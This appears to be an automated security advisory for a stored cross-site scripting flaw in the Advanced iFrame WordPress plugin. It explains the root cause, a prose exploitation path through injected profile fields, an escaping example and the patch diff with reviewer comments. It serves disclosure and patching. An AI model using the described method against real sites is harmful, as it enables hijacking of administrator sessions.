Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2026-25453: Advanced iFrame <= 2025.10 – Authenticated (Contributor+) Stored Cross-Site Scripting (advanced-iframe)

Severity: Medium (CVSS 6.4)
CWE: 79
Vulnerable Version: 2025.10
Patched Version: 2026.0
Disclosed: January 18, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-25453:
The Advanced iFrame WordPress plugin, versions up to and including 2025.10, contains an authenticated stored cross-site scripting (XSS) vulnerability. The vulnerability exists in the plugin’s administration interface and allows attackers with contributor-level or higher privileges to inject malicious scripts into WordPress pages. These scripts execute whenever a user accesses a compromised page. The CVSS score of 6.4 reflects the moderate impact of this privilege-dependent stored XSS.

Atomic Edge research identified the root cause as insufficient output escaping in the plugin’s user information display functions. The vulnerability specifically affects the `advanced-iframe-admin-default.php` file. Lines 71 and 82 in the vulnerable version directly output user data and metadata without proper escaping. The `printUserInfo()` and `printUserMeta()` functions concatenate user information into HTML strings but fail to apply escaping functions to the `$key` and `$value` variables before output.

Exploitation requires an authenticated attacker with contributor-level permissions or higher. The attacker would navigate to the Advanced iFrame plugin settings page, where user information is displayed. By manipulating their own user profile data through WordPress’s standard user profile editing functionality, an attacker can inject malicious JavaScript payloads into fields that the plugin displays. When the plugin’s administration page renders this data, the scripts execute in the context of any administrator viewing the settings page.

Atomic Edge analysis of the patch reveals the fix adds proper output escaping using WordPress’s `esc_html()` function. The patched version at lines 71 and 82 of `advanced-iframe-admin-default.php` now wraps both `$key` and `$value` variables with `esc_html()` before concatenation. This ensures any HTML special characters in user data are converted to their HTML entity equivalents, preventing script execution while preserving data display. The patch also updates the plugin version to 2026.0 and includes additional security improvements to other components.
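
The escaping change described above, as an added example that is not the plugin's own code: the same key/value loop rendered without and with `esc_html()`. The function names and sample profile data are constructed, and outside WordPress `esc_html()` is approximated with `htmlspecialchars()` (an assumption; the real function also validates UTF-8 and applies a filter).

```php
<?php
// Added illustration; function names and data are hypothetical.

// Stand-in so the script runs outside WordPress (assumption, see lead-in).
if (!function_exists('esc_html')) {
    function esc_html($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8');
    }
}

// Pre-patch pattern: key and value are concatenated into markup as-is.
function render_rows_unescaped(array $fields): string {
    $html = '';
    foreach ($fields as $key => $value) {
        if (!is_object($value) && !is_array($value)) {
            $html .= $key . ' => ' . $value . '<br>';
        }
    }
    return $html;
}

// Patched pattern: both sides are escaped at the point of output.
function render_rows_escaped(array $fields): string {
    $html = '';
    foreach ($fields as $key => $value) {
        if (!is_object($value) && !is_array($value)) {
            $html .= esc_html($key) . ' => ' . esc_html($value) . '<br>';
        }
    }
    return $html;
}

// True if the output contains any tag other than the renderer's own <br>.
function has_foreign_markup(string $html): bool {
    return preg_match('/<(?!br>)/i', $html) === 1;
}

// Constructed sample data: markup appears in a key and in a value.
$fields = [
    'display_name' => 'Alice & Bob',
    'note<b>'      => '<script>/* constructed marker */</script>',
    'roles'        => ['contributor'], // skipped: arrays are not rendered
];

$raw  = render_rows_unescaped($fields);
$safe = render_rows_escaped($fields);

echo "unescaped: ", $raw, "\n";
echo "escaped:   ", $safe, "\n";
echo "foreign markup in unescaped output: ", var_export(has_foreign_markup($raw), true), "\n";
echo "foreign markup in escaped output:   ", var_export(has_foreign_markup($safe), true), "\n";
```

The key is escaped as well as the value because either side of the pair can carry markup into the page.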

Successful exploitation leads to stored cross-site scripting attacks within the WordPress administration interface. Attackers can execute arbitrary JavaScript in the context of administrators viewing the plugin settings. This enables session hijacking, privilege escalation, content manipulation, and further site compromise. The stored nature means the payload persists and executes for all subsequent administrators accessing the affected settings page until manually removed.

Differential between vulnerable and patched code

Code Diff
--- a/advanced-iframe/advanced-iframe-admin-page.php
+++ b/advanced-iframe/advanced-iframe-admin-page.php
@@ -248,16 +248,18 @@
           ));
           $text = balanceTags($text, true);
           $devOptions[$item] = stripslashes($text);
+        } elseif ($item === 'id') {
+          $newtext = preg_replace("/W/", "_", $text);
+          // remove trailing numbers
+          $newtext = preg_replace('/^d+/', '', $newtext);
+		  if (!empty($newtext)) {
+		    $devOptions[$item] = $newtext;
+		  }
         } elseif (function_exists('sanitize_text_field')) {
           $devOptions[$item] = stripslashes(sanitize_text_field($text));
         } else {
           $devOptions[$item] = stripslashes($text);
         }
-        if ($item === 'id') {
-          $devOptions[$item] = preg_replace("/W/", "_", $text);
-          // remove trailing numbers
-          $devOptions[$item] = preg_replace('/^d+/', '', $devOptions[$item]);
-        }

         // we check if we have an invalid configuration!
         if ($devOptions['shortcode_attributes'] === 'false' && $devOptions['use_shortcode_attributes_only'] === 'true') {
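Review bot: In the new `elseif ($item === 'id')` branch the two patterns read `/W/` and `/^d+/` as shown here, which match a literal `W` and a run of leading `d` characters rather than non-word characters and digits; if the file really has `\W` and `\d` this is only a rendering loss, otherwise the backslashes need restoring. The inline comment says "remove trailing numbers" while `^` anchors the match to the start of the string, so it should say "leading". When `$newtext` ends up empty the branch leaves `$devOptions['id']` untouched; a short comment at the `!empty($newtext)` check would make that fallback explicit.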
--- a/advanced-iframe/advanced-iframe.php
+++ b/advanced-iframe/advanced-iframe.php
@@ -2,7 +2,9 @@
 /*
 Plugin Name: Advanced iFrame
 Plugin URI: https://wordpress.org/plugins/advanced-iframe/
-Version: 2025.10
+Version: 2026.0
+Requires at least: 5.5
+Requires PHP: 7.4
 Text Domain: advanced-iframe
 Domain Path: /languages
 Author: Michael Dempfle
@@ -33,7 +35,7 @@
 // ini_set('display_startup_errors', 1);
 // error_reporting(E_ALL);

-$aiVersion = '2025.10';
+$aiVersion = '2026.0';
 // check $aiJsSize

 $cons_advancediFrame = null;
@@ -970,7 +972,7 @@

       function createMinimizedAiJs($backend) {
         global $aiVersion;
-        $aiJsSize = 87421;
+        $aiJsSize = 88293;
         $newContent = file_get_contents(dirname(__FILE__) . '/js/ai.js');
         $oldFileName = dirname(__FILE__) . '/js/ai.min.js';
         if ((strlen($newContent) == $aiJsSize) && file_exists($oldFileName)) {
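Review bot: `$aiJsSize = 88293` is a hand-maintained byte count used in the `strlen($newContent) == $aiJsSize` check, so an edit to `js/ai.js` that leaves the length unchanged passes the comparison, and the constant has to be bumped by hand on each release (see the `// check $aiJsSize` reminder next to `$aiVersion`). Comparing a hash of the file contents would remove the magic number.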
@@ -1389,20 +1391,37 @@
         return $content;
       }

-      // The function that handles the AJAX request
+	 /**
+	  * Public AJAX endpoint intentionally exposed to unauthenticated users.
+	  * Used exclusively for creating a temporary FIFO cache.
+	  * No user data or privileged operations performed.
+	  * Cache is only active if the feature "Add iframe URL as param" with hash/hashrewrite is enabled.
+	  * The cache size is reported in the administration so the owner can check, if it is full.
+	  */
       function aip_map_url_callback() {
         check_ajax_referer('aip-parameter-nonce', 'security');
-        $url = urldecode($_POST['url']);
+
+		// check if feature is active
+         $options = get_option($this->adminOptionsName);
+         $hashShortCodeActive = $options['add_iframe_url_as_param_prefix'] == "hash" ||
+		   $options['add_iframe_url_as_param_prefix'] == "hashrewrite";
+
+		if (!$hashShortCodeActive) {
+	       echo "Request_not_valid";
+           die();
+		}
+
+		$url = urldecode($_POST['url']);
 		if (filter_var($url, FILTER_VALIDATE_URL) === FALSE) {
-	      echo "URL_NOT_VALID";
+	      echo "Request_not_valid";
 		  die();
 		}
 		// we use a default wp table as the data is normally quite small.
 		$paramData = get_option("advancediFrameParameterData");
 		if (!empty($paramData)) {
 		  if(count($paramData) > 1000) {
-			echo "TOO_MANY_CACHE_ENTRIES";
-			die();
+			// Remove first cache element so we have a FIFO cache with a max size of 1000
+			array_shift($paramData);
 		  }
 		  $nextid = 1;
           foreach ($paramData as $entry) {
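Review bot: The eviction test `count($paramData) > 1000` only fires once the array already holds more than 1000 entries, and `array_shift()` removes a single element, so the stored option exceeds the "max size of 1000" stated in the comment and the `/1000` shown in the admin text; `>= 1000` would match the documented bound. In the same function `$_POST['url']` and `$options['add_iframe_url_as_param_prefix']` are read without an `isset()` check, and since the docblock describes the endpoint as open to unauthenticated users, a request without `url` or an unset option raises a PHP notice or warning before the "Request_not_valid" path is reached; guard both and compare the prefix with `===`.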
--- a/advanced-iframe/includes/advanced-iframe-admin-default.php
+++ b/advanced-iframe/includes/advanced-iframe-admin-default.php
@@ -71,7 +71,7 @@
       $ovars = get_object_vars($current_user->data);
       foreach ($ovars as $key => $value) {
         if (!is_object($value) && !is_array($value)) {
-          $userinfo_html .= $key . " => " . $value . "<br>";
+          $userinfo_html .= esc_html($key) . " => " . esc_html($value) . "<br>";
         }
       }
       $userinfo_html .= '</span>' . $extraUserInfo;
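Review bot: The context line `$userinfo_html .= '</span>' . $extraUserInfo;` still appends `$extraUserInfo` without escaping, and the usermeta block in the next hunk does the same; its origin is not visible in this diff, so please confirm it is static markup or escape it as well. The `esc_html()` calls on `$key` and `$value` themselves are the right choice for text placed between tags.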
@@ -82,7 +82,7 @@
       $usermeta_html .= '<span id="meta-help">';
       foreach ($all_meta_for_user as $key => $value) {
         if (!is_object($value) && !is_array($value)) {
-          $usermeta_html .= $key . " => " . $value . "<br>";
+          $usermeta_html .= esc_html($key) . " => " . esc_html($value) . "<br>";
         }
       }
       $usermeta_html .= '</span>' . $extraUserInfo;
@@ -129,7 +129,7 @@
       $style_fs = '';
     }
     printTextInput(false, $devOptions, __('Style', 'advanced-iframe'), 'style', __('You can define styles for the iframe if you like. The recommended way is to put the styles in a css file and use the class option. With the button below the width, height, content_id, content_styles, hide_content_until_iframe_color and the needed styles above for a fullscreen iframe are set. Also check the settings at the height where you can do calculations to add fixed headers/footers. Shortcode attribute: style=""' . $style_fs, 'advanced-iframe'));
-    printTextInput(false, $devOptions, __('Id', 'advanced-iframe'), 'id', __('Enter the 'id' attribute of the iframe. Allowed values are only a-zA-Z0-9_. Ids cannot start with a number!!! Do NOT use any other characters because the id is also used to generate unique javascript functions! Other characters will be removed when you save! If a src directly in a shortcode is set and no id than an id is generated automatically if several iframes are on one page to avoid configuration problems. Shortcode attribute: id=""', 'advanced-iframe'));
+    printTextInput(false, $devOptions, __('Id', 'advanced-iframe'), 'id', __('Enter the 'id' attribute of the iframe. Allowed values are only a-zA-Z0-9_. Ids cannot start with a number!!! This settings is mandatory. If the sanitized value is invalid the old value is used. Do NOT use any other characters because the id is also used to generate unique javascript functions! Other characters will be removed when you save! If a src directly in a shortcode is set and no id than an id is generated automatically if several iframes are on one page to avoid configuration problems. Shortcode attribute: id=""', 'advanced-iframe'));
     printTextInput(false, $devOptions, __('Name', 'advanced-iframe'), 'name', __('Enter the 'name' attribute of the iframe. Shortcode attribute: name=""', 'advanced-iframe'));
     printTrueFalse(false, $devOptions, __('Allow full screen', 'advanced-iframe'), 'allowfullscreen', __('allowfullscreen is an HTML attribute that enables videos to be displayed in fullscreen mode. Currently this is a new html attribute not supported by all browsers. So please check  all of the browsers you want to support. Shortcode attribute: allowfullscreen="true" or allowfullscreen="false"', 'advanced-iframe'));

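Review bot: The sentence added to the `id` help string reads "This settings is mandatory"; it should be "This setting is mandatory". As the string is passed through `__()`, fix the wording before release so translators do not pick up the typo.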
--- a/advanced-iframe/includes/advanced-iframe-admin-external-workaround.php
+++ b/advanced-iframe/includes/advanced-iframe-admin-external-workaround.php
@@ -184,7 +184,8 @@
       printTrueDebugFalse($devOptions, __('Use postMessage for communication', 'advanced-iframe'), 'use_post_message', __('From version 7.4, this is the default communication way between the iframe and the parent for new installations of the pro version. See <a class="post-message-help-link" href="#">here</a> for the two different communication ways and what is the best one for you. If you have any problems with windows.postMessage select "Debug" and additional log information about the transfered data is printed to the browser console. "Debug Javascript" on the options tab does also automatically enable the debug mode! If you enable this you also get infos about messages which do NOT belong to advanced iframe! Use F12 at your browser to open the developer tools. The administration does save the current url as targetOrigin into the ai_external.js. If have a multi site or you include your page into different parents than you need the pro version and select "Support WP multisite" to "Yes" as than * is used as targetOrigin. Also use post communication if you have a https page in the iframe and your page is http. Please see <a href="//www.advanced-iframe.com/advanced-iframe/advanced-iframe-pro-demo/external-workaround-with-post-message#e51" target="_blank">example 51</a> for this advanced setup! <a href="#mirp" class="link-id-external-ai-overview">Please see below</a> how to configure ai_external.js directly. If you only enable this in ai_external.js directly you need to use use_post_message="true"/"debug" in the shortcode! You can also use messages from other tools that send the height like iframeSizer. See <a target="_blank" href="https://www.advanced-iframe.com/advanced-iframe/advanced-iframe-pro-demo/integrate-iframe-sizer-script">here</a> for more details.', 'advanced-iframe'), '//www.advanced-iframe.com/advanced-iframe/advanced-iframe-pro-demo/external-workaround-with-post-message#e51', true);
       if ($evanto || $isDemo) {
         printTrueFalse(true, $devOptions, __('Support WP multisite', 'advanced-iframe'), 'multi_domain_enabled', __('This is only supported if you select "Use postMessage for communication" to "yes" or "debug". Please read the documentation at "Use postMessage for communication" how to use this setting!', 'advanced-iframe'), "false", '//www.advanced-iframe.com/advanced-iframe/advanced-iframe-pro-demo/external-workaround-with-post-message', true);
-        printTextInput(true, $devOptions, __('i-20-Include content directly from the iframe', 'advanced-iframe'), 'data_post_message', __('When you enable post communication you can read elements from the iframe and transfer it to the parent and include it there. This is like the feature "Include content directly" from the "Add files/content" from the next tab  but more powerful. You can define here as many elements you like and insert it to the parent page. To enable this setting you need to specify the element of the parent and the element of the iframe separated by a |. Several settings are separated by , e.g. #c-id|#content,#s-id|#some-images,#p-id|#iframe-right p:nth-child(2). You can use any valid <a class="jquery-help-link" href="#">jQuery selector pattern</a> here! Please read the section "<a class="howto-id-link" href="#">How to find the id and the attributes</a>" to find the right id or class. Currently, the iframe is NOT hidden by default. After the setup you need to set display:none; on the basic tab at "Style". Currently, there are no additional settings like for the same domain. So make sure that e.g. the divs you want to add the content have e.g. the correct height for optimal display! This setting cannot be set by a shortcode. <a href="#mirp" class="link-id-external-ai-overview">Please see below</a> how to configure ai_external.js directly.', 'advanced-iframe'), 'text', '//www.advanced-iframe.com/advanced-iframe/advanced-iframe-pro-demo/external-workaround-with-post-message#e52', true);
+        printTextInput(true, $devOptions, __('i-20-Include content directly from the iframe', 'advanced-iframe'), 'data_post_message', __('When you enable post communication you can read elements from the iframe and transfer it to the parent and include it there. This is like the feature "Include content directly" from the "Add files/content" from the next tab  but more powerful. You can define here as many elements you like and insert it to the parent page. To enable this setting you need to specify the element of the parent and the element of the iframe separated by a |. Several settings are separated by , e.g. #c-id|#content,#s-id|#some-images,#p-id|#iframe-right p:nth-child(2). You can use any valid <a class="jquery-help-link" href="#">jQuery selector pattern</a> here! Please read the section "<a class="howto-id-link" href="#">How to find the id and the attributes</a>" to find the right id or class. Currently, the iframe is NOT hidden by default. After the setup you need to set display:none; on the basic tab at "Style". Currently, there are no additional settings like for the same domain. So make sure that e.g. the divs you want to add the content have e.g. the correct height for optimal display! <br><strong>Important</strong>: For security reasons, you must configure this feature in both ai_external.js and the plugin starting with version 2026.0. You can do this by configuring everything here, or by setting it in the shortcode with data_post_message="". AND configuring it with <a href="#mirp" class="link-id-external-ai-overview">dataPostMessage</a>. The plugin removes <script> tags from HTML content to help prevent XSS (Cross-Site Scripting) attacks.', 'advanced-iframe'), 'text', '//www.advanced-iframe.com/advanced-iframe/advanced-iframe-pro-demo/external-workaround-with-post-message#e52', true);
+
         printTextInput(true, $devOptions, __('Scroll to top', 'advanced-iframe'), 'external_scroll_top', __('This solution is only needed if your page inside the iframe is NOT reloading the page when going from one page to the next. If you have an Ajax form no onload event is fired! This solution does send the scroll to top event to the parent if you click on any of the specified elements here! You can use any valid <a class="jquery-help-link" href="#">jQuery selector pattern</a> here! Please read the section "<a class="howto-id-link" href="#">How to find the id and the attributes</a>" to find the right id or class. E.g. "button" would send the on load event if you click on any HTML button element. If you like to scroll to the top of the iframe, you need to select "iframe" on the "Advanced Settings tab -> General advanced features -> Scrolls the parent window/iframe to the top". You need to use postMessage communication for this feature. This setting cannot be set by a shortcode. <a href="#mirp" class="link-id-external-ai-overview">Please see below</a> how to configure ai_external.js directly.', 'advanced-iframe'), 'text', '//www.advanced-iframe.com/advanced-iframe/advanced-iframe-pro-demo/external-workaround-with-post-message#e51', true);
       }
       ?></table>
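Review bot: The new `data_post_message` description ends with a literal `<script>` inside a string that is otherwise rendered as HTML (it carries `<br>`, `<strong>` and `<a>` markup), so the browser will treat it as the start of a script element on the settings page instead of showing the text. Write it as `&lt;script&gt;` in the help string.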
@@ -253,7 +254,7 @@
           <li>domainMultisite - Enable/disable multi site settings. See above. Valid values are "true", "false".</li>
           <li>usePostMessage -  Enable/disable the usage of postMessage for communication. See above. Valid values are true, false.</li>
           <li>debugPostMessage -  Enable/disable the debug of postMessage for communication. See above. Valid values are true, false.</li>
-          <li>dataPostMessage - Defines the elements that should be transfered to the client. See above. </li>
+          <li>dataPostMessage - Defines the elements that should be transfered to the client. Needs to be also set as shortcode because of security reasons OR fully in the administration. See above. </li>
           <li>scroll_to_top - Defines the elements where a scroll to top event is sent back to the parent. See above.</li>
           ', 'advanced-iframe');

--- a/advanced-iframe/includes/advanced-iframe-admin-parameters.php
+++ b/advanced-iframe/includes/advanced-iframe-admin-parameters.php
@@ -9,13 +9,17 @@
 printTextInput(false, $devOptions, __('URL forward parameters', 'advanced-iframe'), 'url_forward_parameter', __('Define the parameters that should be passed from the browser url to the iframe url. Please separate the parameters by ','. Using "ALL" does forward every parameter.<br />GET and POST parameters are supported!<br />Pro users can also map incoming parameters to a different parameter. Wordpress has a couple of <a href="https://codex.wordpress.org/Reserved_Terms" target="_blank">reserved words</a> which can't be used in urls. So if you want to pass the parameter "name" (reserved word) to your iframe you can do a mapping with "ainame|name". Than the parameter "ainame=hallo" will be passed as "name=hallo" to the iframe. This can also be used if the parameters of the 2 pages do not match. Several mappings can be separated with ',' like normal parameters. In e.g. TinyWebGallery this enables you to jump directly to an album or image although TinyWebGallery is included in an iframe. If your parameters contain [] you can use {{ }} which will internally replaced. Since WordPress 5.5 the "page" parameter also causes a 301 redirect. If you still like/need to use it. Go to "Options -> Technical options -> Fix WordPress 5.5 page parameter change" and set it to "Yes". Shortcode attribute: url_forward_parameter=""', 'advanced-iframe'));
 if ($evanto || $isDemo) {
   printTextInput(true, $devOptions, __('Map parameter to url/ Use parameter value as iframe url', 'advanced-iframe'), 'map_parameter_to_url', __('You can map an url parameter value pair to an url or pass the url directly which should be opened in the iframe. If you e.g. have a page with the iframe, and you like to have different content in the iframe depending on an url parameter than this is the setting you have to use. You have to specify this setting in the following syntax "parameter|value|url" e.g. "show|1|https://www.advanced-iframe.com". If you than open the parent page with ?show=1 than https://www.advanced-iframe.com is opened inside the iframe. You can also specify several mappings by separating them by ','.<br />GET and POST parameters are supported!<br />You can also only specify 1 parameter here! The value of this parameter is than used as iframe url. e.g. show=https%3A%2F%2Fwww.tinywebgallery.com%3Fparam=value. You need to encode the url if you pass it in the url. Especially ? (%3F) and & (%26)! Please note that because of security reason only whitelisted chars [a-zA-Z0-9/:?&.] are allowed. Encoded parameters in the urls are not supported because all input is decoded and checked. If you add :sameDomain, then no urls with http/s are not used as iframe URL! e.g. show::sameDomain. See the next setting how to update this url dynamically. If no parameter/value pair does match the normal src attribute of the configuration is used. Shortcode attribute: map_parameter_to_url=""', 'advanced-iframe'));
-  printSameRemote($devOptions, __('i-20-Add iframe URL as param', 'advanced-iframe'), 'add_iframe_url_as_param', __('With this setting the URL of the iframe is added as parameter to the current URL. The parameter can be defined in the setting before. If this is not set the default "iframe" is used (be aware of <a href="https://codex.wordpress.org/Reserved_Terms" target="_blank">reserved words</a>!). This feature is only enabled for the remote domain if you also enable auto height for remote domains because the URL of the iframe is sent with the same request. This enables bookmarkable URLs where you go directly to the last page in the iframe. The history api which enables the change of the URL is only supported by modern browsers. For older browsers the URL is simply not changed. See https://caniuse.com/?search=pushstate. Shortcode attribute: add_iframe_url_as_param="same", add_iframe_url_as_param="remote" or add_iframe_url_as_param="false" ', 'advanced-iframe'), '//www.advanced-iframe.com/advanced-iframe/advanced-iframe-pro-demo/add-iframe-url-to-parent', true);
+  printSameRemote($devOptions, __('i-20-Add iframe URL as param', 'advanced-iframe'), 'add_iframe_url_as_param', __('With this setting the URL of the iframe is added as parameter to the current URL. The parameter can be defined in the setting before. If this is not set the default "iframe" is used (be aware of <a href="https://codex.wordpress.org/Reserved_Terms" target="_blank">reserved words</a>!). This feature is only enabled for the remote domain if you also enable auto height for remote domains because the URL of the iframe is sent with the same request. This enables bookmarkable URLs where you go directly to the last page in the iframe. Shortcode attribute: add_iframe_url_as_param="same", add_iframe_url_as_param="false". If you use the shortcode add_iframe_url_as_param="remote", you also need to set this before ai_external.js like shown in the demo.', 'advanced-iframe'), '//www.advanced-iframe.com/advanced-iframe/advanced-iframe-pro-demo/add-iframe-url-to-parent', true);

   printTrueFalse(true, $devOptions, __('i-40-Add params directly', 'advanced-iframe'), 'add_iframe_url_as_param_direct', __('Enabling this does not add the full iframe URL but only the parameters of the iframe. You need also to configure either "URL forward parameters" or use URL placeholders (see basic tab). This works on the <a target="_blank"  href="//www.advanced-iframe.com/advanced-iframe/advanced-iframe-pro-demo/add-iframe-params-to-parent">same</a> and for <a target="_blank"  href="//www.advanced-iframe.com/advanced-iframe/advanced-iframe-pro-demo/add-iframe-params-to-parent-remote">remote</a> domains. Please go there for a detailed description. Shortcode attribute: add_iframe_url_as_param_direct="true" or add_iframe_url_as_param_direct="false" ', 'advanced-iframe'), 'false', '//www.advanced-iframe.com/advanced-iframe/advanced-iframe-pro-demo/add-iframe-params-to-parent', false);

-  $cleanHashButton = 'Delete the hash/URL cache by clicking <a class="confirmation-hash post" href="admin.php?page=advanced-iframe&remove-url-hash-cache=true">here</a>. Deleting the cache can be useful during setup and if you have changed URLs. It should NOT be done afterwards if defaults ids are used for the URLs as they are generated in order and already bookmarked URLs might change.';
+  $cacheSize = count(get_option("advancediFrameParameterData", []));

-  printTextInput(true, $devOptions, __('i-40-Prefix/id/urlrewrite for iframe URL', 'advanced-iframe'), 'add_iframe_url_as_param_prefix', __('With this setting you can define a prefix which all (most) of your pages in the iframe have. This prefix is than not added to the URL but added internally. This does reduce the length of the parameter value. The prefix has to be without http:// or https://. So a prefix could be www.advanced-iframe.com/demos/. If your pages are e.g. at www.advanced-iframe.com/demos/example1.htm and www.advanced-iframe.com/demos/example2.htm than the page parameter is only page=example2.htm and not page=www.advanced-iframe.com%2Fdemos%2Fexample2.htm.<br> <br>Additionally, this setting has 2 special keywords: "hash" and "hashrewrite". If you enter "hash" then the URL is stored in the database and only an id is used. So the URL is extended by e.g. ?iframe=4. "hashrewrite" additionally does a URL rewrite. So the URL is extended by /iframe/4. The parameter is set at "Map parameter to URL" and is "iframe" by default. IMPORTANT: if you want to use "hashrewrite" you need to set this and "Map parameter to URL" here as well (and in the shortcode) because in the shortcode alone it is loaded too late! As other plugins also can rewrite the URL please check if they are compatible! First use "hash" and then try "hashrewrite"! "hashrewrite" is only possible if you do not use "plain" as "Permalink Settings" (pagename is the one tested the most!). Also it takes a little bit until the id is read from the database. So the URL is changed with a small delay! See the demos for a working examples.</p><p class="description"><strong>With "hashrewrite" are many individual optimizations possible</strong> which depend on the parent and iframe url. Like attaching a specific unique parameter from the iframe url to the parent and load the full url based on this. 
Please contact the <a href="https://www.advanced-iframe.com/advanced-iframe/advanced-iframe-support" target="_blank">support</a> for an individual solution.</p><p class="description">Shortcode attribute: add_iframe_url_as_param_prefix=""', 'advanced-iframe') . $cleanHashButton, 'text', '//www.advanced-iframe.com/advanced-iframe/advanced-iframe-pro-demo/add-iframe-url-to-parent', false);
+  $currentCacheSize =  '<p class="description">Number of cache entries: <strong>'.$cacheSize.'/1000</strong>. Please note that the cache is filled by your users, bots and in the worst case even by hackers because the cache needs to be public! The cache is only active if the hash feature is active. Each of your pages is one cache entry and if it is full, the oldest one will be removed. Please monitor the cache when you enable this feature. If the cache size seems unrealistic I recommend not to use it! Invalid entries are not doing any harm but filling your cache. A full cache will cause that old bookmarks are not working anymore!</p>';
+
+  $cleanHashButton =  $currentCacheSize .'<p class="description">Delete the hash/URL cache by clicking <a class="confirmation-hash post" href="admin.php?page=advanced-iframe&remove-url-hash-cache=true">here</a>. Deleting the cache can be useful during setup and if you have changed URLs. It should NOT be done afterwards if defaults ids are used for the URLs as they are generated in order and already bookmarked URLs might change.</p>';
+
+  printTextInput(true, $devOptions, __('i-40-Prefix/id/urlrewrite for iframe URL', 'advanced-iframe'), 'add_iframe_url_as_param_prefix', __('With this setting you can define a prefix which all (most) of your pages in the iframe have. This prefix is than not added to the URL but added internally. This does reduce the length of the parameter value. The prefix has to be without http:// or https://. So a prefix could be www.advanced-iframe.com/demos/. If your pages are e.g. at www.advanced-iframe.com/demos/example1.htm and www.advanced-iframe.com/demos/example2.htm than the page parameter is only page=example2.htm and not page=www.advanced-iframe.com%2Fdemos%2Fexample2.htm.<br> <br>Additionally, this setting has 2 special keywords: "hash" and "hashrewrite". If you enter "hash" then the URL is stored in the database and only an id is used. So the URL is extended by e.g. ?iframe=4. "hashrewrite" additionally does a URL rewrite. So the URL is extended by /iframe/4. The parameter is set at "Map parameter to URL" and is "iframe" by default. IMPORTANT: if you want to use "hash" or "hashrewrite" you need to set this and "Map parameter to URL" here <strong>AND</strong> in the shortcode, because in the shortcode alone it is loaded too late! As other plugins also can rewrite the URL please check if they are compatible! First use "hash" and then try "hashrewrite"! "hashrewrite" is only possible if you do not use "plain" as "Permalink Settings" (pagename is the one tested the most!). Also it takes a little bit until the id is read from the database. So the URL is changed with a small delay! See the demos for a working examples.</p><p class="description"><strong>With "hashrewrite" are many individual optimizations possible</strong> which depend on the parent and iframe url. Like attaching a specific unique parameter from the iframe url to the parent and load the full url based on this. 
Please contact the <a href="https://www.advanced-iframe.com/advanced-iframe/advanced-iframe-support" target="_blank">support</a> for an individual solution.</p>'. $cleanHashButton .'<p class="description">Shortcode attribute: add_iframe_url_as_param_prefix=""', 'advanced-iframe'), 'text', '//www.advanced-iframe.com/advanced-iframe/advanced-iframe-pro-demo/add-iframe-url-to-parent', false);

   /*
   Features that need further customizations depending on parent/iframe url. They cannot be used out of the box and need changes in the code!
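Review bot: `$cleanHashButton`, which now contains the live `$cacheSize` value, has moved inside the first argument of `__()` in the `add_iframe_url_as_param_prefix` call, so the string handed to the translation lookup changes with the cache count and cannot match a catalogue entry. Keep the `__()` literals static and concatenate `$cleanHashButton` between two translated strings, or use `sprintf()` with a placeholder. Separately, `count(get_option("advancediFrameParameterData", []))` assumes the stored option is always an array; the `[]` default only applies when the option is absent, so an `is_array()` guard would be safer.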
@@ -24,7 +28,7 @@
                                      hashrewrite:title - Depending how unique the parameters of an iframe URL is a specific parameter can be used as key.
   */

-  printSameRemote($devOptions, __('Use the iframe title for the parent', 'advanced-iframe'), 'use_iframe_title_for_parent', __('Enabling this does set the title of the iframe on the parent page once available. This feature works on the same and the remote domain. The original title is shown until the new one is loaded. The original title cannot be hidden as this would be a global setting and also affecting all pages of a website. Shortcode attribute: use_iframe_title_for_parent="same". For the external workaround you need to set it to "Remote Domain" or use use_iframe_title_for_parent="remote" in the ai_external.js settings.', 'advanced-iframe'), '//www.advanced-iframe.com/advanced-iframe/advanced-iframe-pro-demo/add-iframe-url-to-parent', true);
+  printSameRemote($devOptions, __('Use the iframe title for the parent', 'advanced-iframe'), 'use_iframe_title_for_parent', __('Enabling this does set the title of the iframe on the parent page once available. This feature works on the same and the remote domain. The original title is shown until the new one is loaded. The original title cannot be hidden as this would be a global setting and also affecting all pages of a website. Shortcode attribute: use_iframe_title_for_parent="same". For the external workaround you need to set it to "Remote Domain" or set use_iframe_title_for_parent="remote" AND use_iframe_title_for_parent="remote" in the ai_external.js settings. Since 2026.0 the shortcode setting is mandatory if you configure ai_external.js because of security reasons.', 'advanced-iframe'), 'https://www.advanced-iframe.com/advanced-iframe/advanced-iframe-pro-demo/add-iframe-url-to-parent/add-iframe-url-as-param-remote-domain', true);

 }
 echo '</table>';
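Review bot: The new help string on the printSameRemote(...) line names the same attribute twice ("set use_iframe_title_for_parent="remote" AND use_iframe_title_for_parent="remote" in the ai_external.js settings"), so a reader cannot tell which half is the shortcode attribute and which is the ai_external.js setting. Because the next sentence makes the shortcode setting mandatory since 2026.0 for security reasons, name both places explicitly, for example: set use_iframe_title_for_parent="remote" in the shortcode AND in the ai_external.js settings. The documentation link also moves from a protocol-relative URL to https while the other links touched by this patch stay protocol-relative; pick one form.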
--- a/advanced-iframe/includes/advanced-iframe-admin-resize.php
+++ b/advanced-iframe/includes/advanced-iframe-admin-resize.php
@@ -21,7 +21,7 @@
   printNumberInput(false, $devOptions, __('i-20-Resize delay', 'advanced-iframe'), 'onload_resize_delay', __('Sometimes the external page does not have its full height after loading because e.g. parts of the page are build by Javascript. If this is the case you can define a timeout in milliseconds until the resize is called. Otherwise leave this field empty.. Shortcode attribute: onload_resize_delay=""', 'advanced-iframe'));

   printHeightTrueFalse($devOptions, __('i-20-Store height in cookie', 'advanced-iframe'), 'store_height_in_cookie', __('If you enable the dynamic resize the value is calculated each time when the page is loaded. So each time it took a little time until the resize of the iframe is done. And this is visible sometimes if the content page loads very slow or is on a different domain or depends on the browser. By enabling this option the last calculated height is stored in a cookie and available right away. The iframe is first resized to this height and later on when the new height comes it is updated. By default, this is disabled because when you have dynamic content in the iframe it is possible that the iframe does not shrink. So please try this setting with your destination page. <strong>If you use several iframes on one page please don't use this because currently only one cookie per page is supported. Also, you cannot use this feature if you include the ai.js file at the bottom. If you use iframe on different pages different id are needed because the id is part of the cookie</strong>. Shortcode attribute: store_height_in_cookie="true" or store_height_in_cookie="false" ', 'advanced-iframe'));
